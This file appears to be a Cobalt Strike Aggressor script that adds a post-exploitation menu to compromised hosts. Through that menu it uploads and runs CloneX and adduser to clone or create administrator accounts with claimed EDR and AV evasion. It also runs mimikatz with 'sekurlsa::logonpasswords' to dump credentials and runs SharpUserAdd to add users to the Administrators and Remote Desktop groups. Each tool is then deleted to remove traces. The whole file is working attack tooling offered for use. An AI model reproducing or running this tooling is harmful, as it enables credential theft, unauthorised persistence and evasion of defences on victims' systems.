menu "Cloning & adding Users"{
    menu "CloneX"{
        item "Upload CloneX" {
		    blog($1, "\c9=========== Upload CloneX ==========");
            $bid = $1;
            $dialog = dialog("Upload CloneX", %(UploadPath => "C:\\Windows\\Temp\\", bid => $bid), &CloneX);
            drow_text($dialog, "UploadPath",  "Upload path: ");
            dbutton_action($dialog, "Upload");
            dialog_show($dialog);
        }
        sub CloneX {
            bcd($bid, $3['UploadPath']);
            bupload($bid, script_resource("/scripts/BypassCxk/Cl0neX.exe"));
        }
        item "Run CloneX" {
			blog($1, "\c9=========== Run CloneX ==========");
            btask($bid, "CloneX help", "");
            btask($bid, "1.Clone zhangsan as administrator: Cl0neX.exe zhangsan", "");
            btask($bid, "2.Clone zhangsan as lisi: Cl0neX.exe zhangsan lisi", "");
            btask($bid, "3.Add zhangsan/123456 account(try to bypass edr): Cl0neX.exe zhangsan 123456", "");
            btask($bid, "4.Add zhangsan/123456 account(try to bypass edr) and clone as wangwu: Cl0neX.exe zhangsan 123456 wangwu", "");
            btask($bid, "CloneX", "");
            $bid = $1['@'];
            $dialog = dialog("Run CloneX",%(exec => "Cl0neX.exe zhangsan 123456", bid => $bid),&CloneX_run);
            drow_text($dialog, "exec", "Exec: ");
            dbutton_action($dialog, "Run");
            dialog_show($dialog);
        }
        sub CloneX_run {
            $exec = $3['exec'];
            bshell($bid, "$exec");
        }
        item "Delete CloneX" {
			blog($1, "\c9=========== Delete CloneX ==========");
            $bid = $1['@'];
            bshell($bid, " del /f /s /q Cl0neX.exe");
        }   
    }

    menu "Adduser"{
        item "Upload adduser" {
		    blog($1, "\c9=========== Upload adduser ==========");
            $bid = $1;
            $dialog = dialog("Upload adduser", %(UploadPath => "C:\\Windows\\Temp\\", bid => $bid), &adduser);
            drow_text($dialog, "UploadPath",  "Upload path: ");
            dbutton_action($dialog, "Upload");
            dialog_show($dialog);
        }
        sub adduser {
            bcd($bid, $3['UploadPath']);
            bupload($bid, script_resource("/scripts/BypassCxk/adduser.exe"));
        }
        item "Run adduser" {
			blog($1, "\c9=========== Run adduser ==========");
            $bid = $1['@'];
            $dialog = dialog("Run adduser",%(exec => "adduser.exe", bid => $bid),&adduser_run);
            drow_text($dialog, "exec", "Exec: ");
            dbutton_action($dialog, "Run");
            dialog_show($dialog);
        }
        sub adduser_run {
            $exec = $3['exec'];
            bshell($bid, "$exec");
        }
        item "Delete adduser" {
			blog($1, "\c9=========== Delete adduser ==========");
            $bid = $1['@'];
            bshell($bid, " del /f /s /q adduser.exe");
        }   
    }
    menu "Mimikatz" {
        item "Upload mimikatz" {
			blog($1, "\c9=========== Upload mimikatz ==========");
            $bid = $1;
            $dialog = dialog("Upload mimikatz", %(UploadPath => "C:\\Windows\\Temp\\", bid => $bid), &mimi);
            drow_text($dialog, "UploadPath",  "Upload path: ");
            dbutton_action($dialog, "Upload");
            dialog_show($dialog);
        }
        sub mimi {
            bcd($bid, $3['UploadPath']);
            bupload($bid, script_resource("/scripts/BypassCxk/mimi.exe"));
        }
        item "logonpasswords" {
			blog($1, "\c9=========== logonpasswords ==========");
            $bid = $1;
            bshell($bid,"mimi.exe \"privilege::debug\" \"sekurlsa::logonpasswords\" exit");
        }
        item "Delete mimikatz" {
			blog($1, "\c9=========== Delete mimikatz ==========");
            $bid = $1['@'];
            bshell($bid, " taskkill -f /im mimi.exe & del /f /s /q mimi.exe");
        }        
    }
    item "SharpUserAdd" {
        blog($1, "\c9=========== SharpUserAdd ==========");
        $bid = $1['@'];
        $dialog = dialog("SharpUserAdd (.NET 2.0)", %(exec => "test",bid => $bid), &SharpUserAdd);
        dialog_description($dialog, "Bypass AV adds users to the Administrators and Remote Desktops group using the DirectoryService namespace");
        drow_text($dialog, "exec", "Parameters：");
        dbutton_action($dialog, "Run");
        dialog_show($dialog);
    }

    sub SharpUserAdd{
        $arg = join(' ', @($3['exec']));
        bexecute_assembly($bid, script_resource("/scripts/BypassCxk/SharpUserAdd.exe"), $arg);
    }

}
